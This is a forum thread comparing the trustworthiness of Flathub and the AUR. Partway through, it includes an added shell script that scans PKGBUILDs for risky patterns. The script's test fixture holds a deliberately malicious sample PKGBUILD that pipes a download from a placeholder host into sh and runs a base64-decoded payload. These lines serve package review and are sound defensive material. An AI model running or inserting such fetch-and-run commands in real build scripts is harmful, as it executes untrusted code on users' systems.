Another question just came up during my big laptop package cleanup… Due to the latest attacks against node/npm and malicious packages in the AUR (from now on I check the PKGBUILD before giving it a go - I swear!), I try to get as much as possible from core/extra and install the stuff I really need from other sources/repos, and delete the rest after testing or after a temporary period of usage.
I could now boil my AUR packages down to <10. The Flatpak count is 5 (could not find them elsewhere).
Question now is:
Is Flathub a more reliable source for packages than the AUR? Especially for less popular packages? Can I rely on some kind of audit from Flathub? Or is it the community on both sides that takes care of security?
Thanks for any ideas/thoughts - have a nice Sunday
Flathub has the same problem as the AUR: anyone can upload anything, although Flathub has verified accounts, which should be safer. As the XZ incident showed, this is not necessarily true though.
I’ve never needed to use Flatpaks. The few times the AUR has been down have been a minor inconvenience but haven’t halted my personal production of anything. I also don’t rely on a lot of packages from the AUR, just the few I can’t get in the normal repos.
With all that said, each case is very different. At the end of the day it comes down to YOUR needs. Arch is all about using the tool one needs to get the job done.
If Flatpaks are maintained by the devs themselves, I tend to use Flatpak nowadays; sometimes Flatpak is the only official option anyway.
In case both options are given, I tend to use Flatpak if the app has to be up to date all the time. Flatpaks are often maintained faster than the official repos or the AUR. Despite not being in the AUR but in the official repos, Discord is a good example. Most of the time the repos aren’t updated fast enough.
On packages that are maintained by 3rd-party maintainers as a whole, I tend to use the AUR, because I can have a look at the PKGBUILD first, before installation.
Everybody can make a request to be hosted on Flathub, which is then reviewed by humans and has to fulfil some quality standards and technical requirements.
Interesting, it seems it’s a lot safer than I thought, but I do wonder how much they check the code of a submitted Flatpak for maliciousness, as it would be a hell of a lot of work keeping up with that.
There have been many threads here about the AUR, Flatpak, and other package sources.
For example: Flatpak vs AUR?
The AUR has the advantage that you have the opportunity to check how the package will be created. But of course you need to know a few things about software in order to do the check.
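The PKGBUILD review that the two posts above recommend, as an added example that is not part of this thread and not a tool of the AUR or Arch projects: a POSIX sh first pass that lists where the sources come from and flags the constructs that most often turn out to be malicious or sloppy (remote content piped into a shell, base64-decoded payloads, `'SKIP'` checksums, plain-http fetches, writes into `$HOME`, `sudo`, setuid modes, an `.install` hook). The suspicious and clean PKGBUILDs it runs on are constructed for the example (`example-tool`, `example.invalid`, a zero placeholder checksum); nothing here comes from a real package. It assumes only sh, grep and awk, so it needs neither network nor makepkg, and it does not replace reading the file.

```shell
#!/bin/sh
# check_pkgbuild.sh: first-pass sanity check of an AUR PKGBUILD before makepkg.
# Added example for this thread, not an AUR/Arch tool. Flags lines that deserve
# a close read; a clean run does NOT prove the PKGBUILD is safe.

# scan LABEL ERE: print every line of $pkgbuild matching ERE, tagged with LABEL.
scan() {
    matches=$(grep -nE "$2" "$pkgbuild" || true)
    if [ -n "$matches" ]; then
        printf '%s\n' "$matches" | while IFS= read -r line; do
            printf 'WARN %-16s %s\n' "$1" "$line"
        done
        hits=$((hits + 1))
    fi
}

# check_pkgbuild FILE: list the sources for manual review, then flag risky
# constructs. Returns 0 when nothing was flagged, 1 otherwise.
check_pkgbuild() {
    pkgbuild=$1
    hits=0
    # Always eyeball where the code comes from: every URL, every VCS checkout.
    awk '/^[ \t]*source(_[A-Za-z0-9_]+)?=\(/ { p = 1 }
         p { print "SRC  " $0 }
         p && /\)/ { p = 0 }' "$pkgbuild"
    # Remote content piped straight into a shell.
    scan pipe-to-shell   '(curl|wget)[^|]*\|[[:space:]]*(ba|z|k)?sh([[:space:]]|$)'
    # Encoded payloads decoded at build time hide what actually runs.
    scan decoded-payload 'base64[[:space:]]+(-d|--decode)|xxd[[:space:]]+-r'
    scan eval            '(^|[[:space:]])eval[[:space:]]'
    # 'SKIP' in a checksum array means that source is never verified.
    scan checksum-skip   "'SKIP'"
    # Fetching over http:// or git:// allows tampering in transit.
    scan insecure-fetch  '(http|git|ftp)://'
    # A build should never touch the building user's home or need root.
    scan writes-to-home  '\$HOME|~/|/home/'
    scan sudo            '(^|[^A-Za-z])sudo([[:space:]]|$)'
    # Setuid/setgid bits or 4xxx/2xxx/6xxx modes set in package().
    scan setuid          'chmod[[:space:]]+(-[A-Za-z]+[[:space:]]+)?([ugoa]*\+[rwx]*s|[2467][0-7]{3})'
    # An .install hook runs as root at install time: review that file as well.
    scan install-hook    '^[[:space:]]*install='
    [ "$hits" -eq 0 ]
}

# count_findings FILE: number of flagged lines; always exits 0 for scripting.
count_findings() {
    check_pkgbuild "$1" | grep -c '^WARN' || true
}

# Constructed, deliberately suspicious PKGBUILD (not a real AUR package).
write_sample_pkgbuild() {
    cat > "$1" <<'EOF'
pkgname=example-tool
pkgver=1.2.3
pkgrel=1
arch=('x86_64')
install=example-tool.install
source=("http://example.invalid/${pkgname}-${pkgver}.tar.gz"
        "git+https://example.invalid/helper.git")
sha256sums=('SKIP'
            'SKIP')

build() {
  cd "$srcdir/$pkgname-$pkgver"
  curl -s https://example.invalid/setup.sh | sh
  echo "ZWNobyBoaQo=" | base64 -d | sh
  make
}

package() {
  make DESTDIR="$pkgdir" install
  chmod 4755 "$pkgdir/usr/bin/example-tool"
  cp config "$HOME/.config/example-tool"
}
EOF
}

# Constructed PKGBUILD with none of the flagged patterns (placeholder checksum).
write_clean_pkgbuild() {
    cat > "$1" <<'EOF'
pkgname=example-tool
pkgver=1.2.3
pkgrel=1
arch=('x86_64')
source=("https://example.invalid/${pkgname}-${pkgver}.tar.gz")
sha256sums=('0000000000000000000000000000000000000000000000000000000000000000')

build() {
  cd "$srcdir/$pkgname-$pkgver"
  make
}

package() {
  cd "$srcdir/$pkgname-$pkgver"
  make DESTDIR="$pkgdir" install
}
EOF
}

# With a PKGBUILD path: check it (exit 1 if anything was flagged).
# Without arguments: run the checks on the constructed suspicious sample.
main() {
    if [ $# -gt 0 ]; then
        check_pkgbuild "$1"
    else
        tmp=$(mktemp)
        write_sample_pkgbuild "$tmp"
        check_pkgbuild "$tmp" || printf '%s finding(s): read the PKGBUILD before makepkg\n' "$(count_findings "$tmp")"
        rm -f "$tmp"
    fi
}

main "$@"
```

Run it as `sh check_pkgbuild.sh PKGBUILD` from the cloned AUR directory before `makepkg -si`; with no argument it prints the eight findings from the constructed sample. The patterns are deliberately broad (a legitimate `http://` mirror or a setuid helper will trigger them too), because the point is to force a look at the lines that matter, not to automate the decision.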
Flatpak can’t check the actual project code; that would be an impossible effort. They do what every other distro incl. Arch does: provide some level of trust to ship what was provided as source upstream. Whatever was or wasn’t maliciously done on the source level is a different question.
But if something goes horribly wrong on the source level, then Flatpak at least offers the last line of defense of everything running somewhat sandboxed. With Arch (or the AUR), everything user-accessible would essentially be game over.
PS: For the same reason I sometimes prefer Flatpak over the AUR or even Arch packages. I don’t know what Spotify or Discord ship in their binary blobs; I’d rather have them in the Flatpak sandbox. The same goes for packages that load 3rd-party plugins like e.g. Obsidian. Let’s be honest, most of us don’t deploy AppArmor and co. and just run things raw.